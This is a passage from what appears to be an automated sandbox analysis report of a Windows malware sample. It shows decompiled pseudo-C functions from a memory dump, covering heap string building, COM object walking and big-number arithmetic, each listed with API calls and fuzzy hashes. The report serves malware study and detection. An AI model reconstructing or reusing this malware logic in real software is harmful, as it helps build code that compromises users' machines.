                                                                                                                                                                                                                                			E00A9462F(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t36 = __edx;
                                                                                                                                                                                                                                				_t32 = __ecx;
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_t42 =  *0xa9d380; // 0x4fd9ba8
                                                                                                                                                                                                                                				_push(0x800);
                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                				_push( *0xa9d270);
                                                                                                                                                                                                                                				if( *0xa9d284 >= 5) {
                                                                                                                                                                                                                                					if(RtlAllocateHeap() == 0) {
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						_t30 = 8;
                                                                                                                                                                                                                                						L7:
                                                                                                                                                                                                                                						if(_t30 != 0) {
                                                                                                                                                                                                                                							L10:
                                                                                                                                                                                                                                							 *0xa9d284 =  *0xa9d284 + 1;
                                                                                                                                                                                                                                							L11:
                                                                                                                                                                                                                                							return _t30;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t44 = _a4;
                                                                                                                                                                                                                                						_t40 = _v8;
                                                                                                                                                                                                                                						 *_a16 = _a4;
                                                                                                                                                                                                                                						 *_a20 = E00A9680B(_t44, _t40);
                                                                                                                                                                                                                                						_t18 = E00A92274(_t40, _t44);
                                                                                                                                                                                                                                						if(_t18 != 0) {
                                                                                                                                                                                                                                							 *_a8 = _t40;
                                                                                                                                                                                                                                							 *_a12 = _t18;
                                                                                                                                                                                                                                							if( *0xa9d284 < 5) {
                                                                                                                                                                                                                                								 *0xa9d284 =  *0xa9d284 & 0x00000000;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t30 = 0xbf;
                                                                                                                                                                                                                                						E00A9651D();
                                                                                                                                                                                                                                						HeapFree( *0xa9d270, 0, _t40);
                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t24 = E00A9A565(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                					_t30 = _t24;
                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(RtlAllocateHeap() == 0) {
                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t24 = E00A970F4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
                                                                                                                                                                                                                                				goto L5;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 00A94653
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: GetTickCount.KERNEL32 ref: 00A97108
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: wsprintfA.USER32 ref: 00A97158
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: wsprintfA.USER32 ref: 00A97175
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: wsprintfA.USER32 ref: 00A971A1
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: HeapFree.KERNEL32(00000000,?), ref: 00A971B3
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: wsprintfA.USER32 ref: 00A971D4
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: HeapFree.KERNEL32(00000000,?), ref: 00A971E4
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A97212
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: GetTickCount.KERNEL32 ref: 00A97223
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 00A94671
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000002,00A9A0CB,?,00A9A0CB,00000002,?,?,00A958BD,?), ref: 00A946CE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1676223858-1536154274
                                                                                                                                                                                                                                • Opcode ID: 75201c5250a24b97e5bcac9979f5bacaaad2a5f8cc2b87d0dfa7de08dab31443
                                                                                                                                                                                                                                • Instruction ID: 1811339ad0b3879320ba434fda79db982f7b4f864b979c2dfff3319986fa713f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75201c5250a24b97e5bcac9979f5bacaaad2a5f8cc2b87d0dfa7de08dab31443
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C92138B6300205EBDF11DF94DD85EDA37FCAB0A354F100026FA02AB251DB70E946DBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00A92EE1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A92FC6
                                                                                                                                                                                                                                  • Part of subcall function 00A96533: SysAllocString.OLEAUT32(00A9C2B0), ref: 00A96583
                                                                                                                                                                                                                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 00A93019
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A93028
                                                                                                                                                                                                                                  • Part of subcall function 00A9590A: Sleep.KERNEL32(000001F4), ref: 00A95952
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3193056040-0
                                                                                                                                                                                                                                • Opcode ID: 73b761615d8beb3a256d9719d2d7d0fd4bc97cbefd5bf8cc897e86d8dc0c7787
                                                                                                                                                                                                                                • Instruction ID: 7ac37719d709c50734b9cda2c126a01e648d2e36eb7175c4a1a085cc864fa197
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73b761615d8beb3a256d9719d2d7d0fd4bc97cbefd5bf8cc897e86d8dc0c7787
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B512C36A00609EFDF11CFA8C944A9AB7F5FF88750F158829E505DB224DB71EE46CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 46%
                                                                                                                                                                                                                                			E00A96533(intOrPtr* __eax) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				WCHAR* _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				void* _v32;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				short _v48;
                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                				short _v64;
                                                                                                                                                                                                                                				intOrPtr* _t54;
                                                                                                                                                                                                                                				intOrPtr* _t56;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				intOrPtr* _t58;
                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                                                				intOrPtr* _t63;
                                                                                                                                                                                                                                				intOrPtr* _t65;
                                                                                                                                                                                                                                				short _t67;
                                                                                                                                                                                                                                				intOrPtr* _t68;
                                                                                                                                                                                                                                				intOrPtr* _t70;
                                                                                                                                                                                                                                				intOrPtr* _t72;
                                                                                                                                                                                                                                				intOrPtr* _t75;
                                                                                                                                                                                                                                				intOrPtr* _t77;
                                                                                                                                                                                                                                				intOrPtr _t79;
                                                                                                                                                                                                                                				intOrPtr* _t83;
                                                                                                                                                                                                                                				intOrPtr* _t87;
                                                                                                                                                                                                                                				intOrPtr _t103;
                                                                                                                                                                                                                                				intOrPtr _t109;
                                                                                                                                                                                                                                				void* _t118;
                                                                                                                                                                                                                                				void* _t122;
                                                                                                                                                                                                                                				void* _t123;
                                                                                                                                                                                                                                				intOrPtr _t130;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t123 = _t122 - 0x3c;
                                                                                                                                                                                                                                				_push( &_v8);
                                                                                                                                                                                                                                				_push(__eax);
                                                                                                                                                                                                                                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                                                                                                                				if(_t118 >= 0) {
                                                                                                                                                                                                                                					_t54 = _v8;
                                                                                                                                                                                                                                					_t103 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					_t5 = _t103 + 0xa9e038; // 0x3050f485
                                                                                                                                                                                                                                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                                                                                                                					_t56 = _v8;
                                                                                                                                                                                                                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                                                                                                                					if(_t118 >= 0) {
                                                                                                                                                                                                                                						__imp__#2(0xa9c2b0);
                                                                                                                                                                                                                                						_v28 = _t57;
                                                                                                                                                                                                                                						if(_t57 == 0) {
                                                                                                                                                                                                                                							_t118 = 0x8007000e;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t60 = _v32;
                                                                                                                                                                                                                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                                                                                                                							_t87 = __imp__#6;
                                                                                                                                                                                                                                							_t118 = _t61;
                                                                                                                                                                                                                                							if(_t118 >= 0) {
                                                                                                                                                                                                                                								_t63 = _v24;
                                                                                                                                                                                                                                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                                                                                                                								if(_t118 >= 0) {
                                                                                                                                                                                                                                									_t130 = _v20;
                                                                                                                                                                                                                                									if(_t130 != 0) {
                                                                                                                                                                                                                                										_t67 = 3;
                                                                                                                                                                                                                                										_v64 = _t67;
                                                                                                                                                                                                                                										_v48 = _t67;
                                                                                                                                                                                                                                										_v56 = 0;
                                                                                                                                                                                                                                										_v40 = 0;
                                                                                                                                                                                                                                										if(_t130 > 0) {
                                                                                                                                                                                                                                											while(1) {
                                                                                                                                                                                                                                												_t68 = _v24;
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												_t123 = _t123;
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												asm("movsd");
                                                                                                                                                                                                                                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                                                                                                                                												if(_t118 < 0) {
                                                                                                                                                                                                                                													goto L16;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												_t70 = _v8;
                                                                                                                                                                                                                                												_t109 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                												_t28 = _t109 + 0xa9e0bc; // 0x3050f1ff
                                                                                                                                                                                                                                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                                                                                                                                												if(_t118 >= 0) {
                                                                                                                                                                                                                                													_t75 = _v16;
                                                                                                                                                                                                                                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                                                                                                                                													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                														_t79 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                														_t33 = _t79 + 0xa9e078; // 0x76006f
                                                                                                                                                                                                                                														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                                                                                                                															_t83 = _v16;
                                                                                                                                                                                                                                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                														 *_t87(_v12);
                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                													_t77 = _v16;
                                                                                                                                                                                                                                													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												_t72 = _v8;
                                                                                                                                                                                                                                												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                                                                                                                												_v40 = _v40 + 1;
                                                                                                                                                                                                                                												if(_v40 < _v20) {
                                                                                                                                                                                                                                													continue;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												goto L16;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								L16:
                                                                                                                                                                                                                                								_t65 = _v24;
                                                                                                                                                                                                                                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							 *_t87(_v28);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t58 = _v32;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t118;
                                                                                                                                                                                                                                			}






































                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00A9C2B0), ref: 00A96583
                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00A96664
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A9667D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00A966AC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1885612795-0
                                                                                                                                                                                                                                • Opcode ID: 33a2316264ee3e90b1c947ef2e0e8db83dab77daebba08570c5fc04e5b75e19e
                                                                                                                                                                                                                                • Instruction ID: 3b288319af80d414e461c781120bd286c86d894ead3a37f43ec3e5fc5f8d27b9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33a2316264ee3e90b1c947ef2e0e8db83dab77daebba08570c5fc04e5b75e19e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C515C75E00519EFCF04DFE8C9889AEB7B9FF89704B144589E905EB214DB31AD42CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E00A94EEE(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				void _v156;
                                                                                                                                                                                                                                				void _v428;
                                                                                                                                                                                                                                				void* _t55;
                                                                                                                                                                                                                                				unsigned int _t56;
                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                				signed int _t74;
                                                                                                                                                                                                                                				void* _t76;
                                                                                                                                                                                                                                				signed int _t79;
                                                                                                                                                                                                                                				void* _t81;
                                                                                                                                                                                                                                				void* _t92;
                                                                                                                                                                                                                                				void* _t96;
                                                                                                                                                                                                                                				signed int* _t99;
                                                                                                                                                                                                                                				signed int _t101;
                                                                                                                                                                                                                                				signed int _t103;
                                                                                                                                                                                                                                				void* _t107;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t92 = _a12;
                                                                                                                                                                                                                                				_t101 = __eax;
                                                                                                                                                                                                                                				_t55 = E00A9650C(_a16, _t92);
                                                                                                                                                                                                                                				_t79 = _t55;
                                                                                                                                                                                                                                				if(_t79 == 0) {
                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                					return _t55;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                                                                				_t81 = 0;
                                                                                                                                                                                                                                				_t96 = 0x20;
                                                                                                                                                                                                                                				if(_t56 == 0) {
                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                					_t97 = _t96 - _t81;
                                                                                                                                                                                                                                					_v12 = _t96 - _t81;
                                                                                                                                                                                                                                					E00A95450(_t79,  &_v428);
                                                                                                                                                                                                                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00A97436(_t101,  &_v428, _a8, _t96 - _t81);
                                                                                                                                                                                                                                					E00A97436(_t79,  &_v156, _a12, _t97);
                                                                                                                                                                                                                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                                                                                                                                                                                                					_t66 = E00A95450(_t101, 0xa9d168);
                                                                                                                                                                                                                                					_t103 = _t101 - _t79;
                                                                                                                                                                                                                                					_a8 = _t103;
                                                                                                                                                                                                                                					if(_t103 < 0) {
                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                						E00A95450(_a16, _a4);
                                                                                                                                                                                                                                						E00A91072(_t79,  &_v428, _a4, _t97);
                                                                                                                                                                                                                                						memset( &_v428, 0, 0x10c);
                                                                                                                                                                                                                                						_t55 = memset( &_v156, 0, 0x84);
                                                                                                                                                                                                                                						goto L18;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                							_push(1);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push( *_t99);
                                                                                                                                                                                                                                							L00A9AEC0();
                                                                                                                                                                                                                                							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                                                                							asm("adc edx, esi");
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push(_v8 + 1);
                                                                                                                                                                                                                                							_push(_t92);
                                                                                                                                                                                                                                							_push(_t74);
                                                                                                                                                                                                                                							L00A9AEBA();
                                                                                                                                                                                                                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                                                                								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                                                                								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t74 =  *_t99;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                                                                                                                                                                                                						_a12 = _t74;
                                                                                                                                                                                                                                						_t76 = E00A96A23(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                							if( *_t99 != 0) {
                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                							_t92 =  &_v156;
                                                                                                                                                                                                                                							if(E00A967D9(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L14:
                                                                                                                                                                                                                                							_a12 = _a12 + 1;
                                                                                                                                                                                                                                							_t76 = E00A95465(_t79,  &_v156, _t106, _t106);
                                                                                                                                                                                                                                							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                							if( *_t99 != 0) {
                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_a8 = _a8 - 1;
                                                                                                                                                                                                                                						_t66 = _a12;
                                                                                                                                                                                                                                						_t99 = _t99 - 4;
                                                                                                                                                                                                                                						 *(0xa9d168 + _a8 * 4) = _t66;
                                                                                                                                                                                                                                					} while (_a8 >= 0);
                                                                                                                                                                                                                                					_t97 = _v12;
                                                                                                                                                                                                                                					goto L17;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				while(_t81 < _t96) {
                                                                                                                                                                                                                                					_t81 = _t81 + 1;
                                                                                                                                                                                                                                					_t56 = _t56 >> 1;
                                                                                                                                                                                                                                					if(_t56 != 0) {
                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L4;
                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                0x00a94f93
                                                                                                                                                                                                                                0x00a94f99
                                                                                                                                                                                                                                0x00a94f9b
                                                                                                                                                                                                                                0x00a94f9d
                                                                                                                                                                                                                                0x00a94f9f
                                                                                                                                                                                                                                0x00a94fa1
                                                                                                                                                                                                                                0x00a94fab
                                                                                                                                                                                                                                0x00a94fb0
                                                                                                                                                                                                                                0x00a94fb2
                                                                                                                                                                                                                                0x00a94fb4
                                                                                                                                                                                                                                0x00a94fb5
                                                                                                                                                                                                                                0x00a94fb6
                                                                                                                                                                                                                                0x00a94fb7
                                                                                                                                                                                                                                0x00a94fbe
                                                                                                                                                                                                                                0x00a94fc5
                                                                                                                                                                                                                                0x00a94fc8
                                                                                                                                                                                                                                0x00a94fc8
                                                                                                                                                                                                                                0x00a94f95
                                                                                                                                                                                                                                0x00a94f95
                                                                                                                                                                                                                                0x00a94f95
                                                                                                                                                                                                                                0x00a94fd0
                                                                                                                                                                                                                                0x00a94fd8
                                                                                                                                                                                                                                0x00a94fe4
                                                                                                                                                                                                                                0x00a94fe9
                                                                                                                                                                                                                                0x00a94fe9
                                                                                                                                                                                                                                0x00a94fee
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94ff0
                                                                                                                                                                                                                                0x00a94ff3
                                                                                                                                                                                                                                0x00a95000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95002
                                                                                                                                                                                                                                0x00a95002
                                                                                                                                                                                                                                0x00a9500f
                                                                                                                                                                                                                                0x00a94fe9
                                                                                                                                                                                                                                0x00a94fee
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94fee
                                                                                                                                                                                                                                0x00a95019
                                                                                                                                                                                                                                0x00a9501c
                                                                                                                                                                                                                                0x00a9501f
                                                                                                                                                                                                                                0x00a95026
                                                                                                                                                                                                                                0x00a95026
                                                                                                                                                                                                                                0x00a95033
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95033
                                                                                                                                                                                                                                0x00a94f1f
                                                                                                                                                                                                                                0x00a94f23
                                                                                                                                                                                                                                0x00a94f24
                                                                                                                                                                                                                                0x00a94f26
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94f26
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00A94FA1
                                                                                                                                                                                                                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00A94FB7
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A95060
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A95076
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3041852380-0
                                                                                                                                                                                                                                • Opcode ID: fec8bf0c2eb182f8b98f082837c19ce8bd1dfd789bfa9154aa367cd83435c2e6
                                                                                                                                                                                                                                • Instruction ID: fc07f5bd123d7685d005b9dd9e3614bf567e95f71d07f6f878a6a38409c19bd0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fec8bf0c2eb182f8b98f082837c19ce8bd1dfd789bfa9154aa367cd83435c2e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B341C032B0021AAFDF209F68CD42FEE77F5EF49710F004569B909A7281DB70AE458B91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E00A96C82(signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                                				void* __ecx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				signed int _t6;
                                                                                                                                                                                                                                				intOrPtr _t8;
                                                                                                                                                                                                                                				intOrPtr _t12;
                                                                                                                                                                                                                                				short* _t19;
                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                				signed int* _t28;
                                                                                                                                                                                                                                				CHAR* _t30;
                                                                                                                                                                                                                                				long _t31;
                                                                                                                                                                                                                                				intOrPtr* _t32;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t6 =  *0xa9d2a8; // 0xd448b889
                                                                                                                                                                                                                                				_t32 = _a4;
                                                                                                                                                                                                                                				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                                                                                                                				_t8 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                				_t3 = _t8 + 0xa9e876; // 0x61636f4c
                                                                                                                                                                                                                                				_t25 = 0;
                                                                                                                                                                                                                                				_t30 = E00A96E66(_t3, 1);
                                                                                                                                                                                                                                				if(_t30 != 0) {
                                                                                                                                                                                                                                					_t25 = CreateEventA(0xa9d2e4, 1, 0, _t30);
                                                                                                                                                                                                                                					E00A953BB(_t30);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t12 =  *0xa9d294; // 0x4000000a
                                                                                                                                                                                                                                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00A9A1D4() != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					_t28 = _a8;
                                                                                                                                                                                                                                					if(_t28 != 0) {
                                                                                                                                                                                                                                						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t31 = E00A974A5(_t32, 0);
                                                                                                                                                                                                                                					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                                                                                                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                                                                                                                						 *_t28 =  *_t28 & 0xfffffffe;
